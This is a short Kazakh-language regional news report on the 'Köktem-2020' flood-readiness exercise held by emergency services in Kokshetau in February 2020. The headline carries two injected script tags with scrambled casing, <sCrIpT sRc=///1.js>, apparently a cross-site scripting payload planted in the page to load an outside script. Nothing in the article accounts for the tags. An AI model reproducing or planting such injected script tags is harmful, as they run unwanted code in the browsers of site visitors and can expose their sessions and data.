Көкшетауда «Көктем-2020» оқу жаттығуы өткізілуде<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
26.02.2020
В Кокшетау организован областной штаб «Көктем-2020»
Ақмола облысында 2020 жылғы 25-26 ақпан аралығында «Көктем-2020» республикалық командалық-штабтық оқу-жаттығу өткізілуде,-деп хабарлайды Aqmola News ақпарат агенттігі Ақмола облысы ТЖД баспасөз қызметіне сілтеме жасап.

Мақсат – көктемгі су тасқыны кезеніңде төтенше жағдайларды жоюбасқару органдарының күштері мен құралдарын дайындау. Су тасқыны кезінде арнайы тактикалық жұмыстарды жетілдіріп, төтенше жағдай туындаған кезде жоғары әзірлік режімін қалыптастыру. Сол арқылы азаматтарды қорғауға алып, халықтың мал-мүлкін, дүниесін сақтап қалу үшін іс-қимылдарды пысықтау.
«Бастау-1001» сигналы түскеннен кейін Төтеншеліктер дереу іске кірісті.
Сонымен қатар дабыл туралы жергілікті атқарушы органдар, облыстық ТЖ комиссиясы, азаматтық қорғау қызметтері, ұлттық ұланның 5510 әскери бөлімі хабардар етілді.
Содан соң штаб бастығы полковник Қанат Доспаев облыстық ТЖ комиссиясының мүшелерімен және облыстық азаматтық қорғау қызметінің бастықтарымен кеңес өткізді.

Просмотров: 353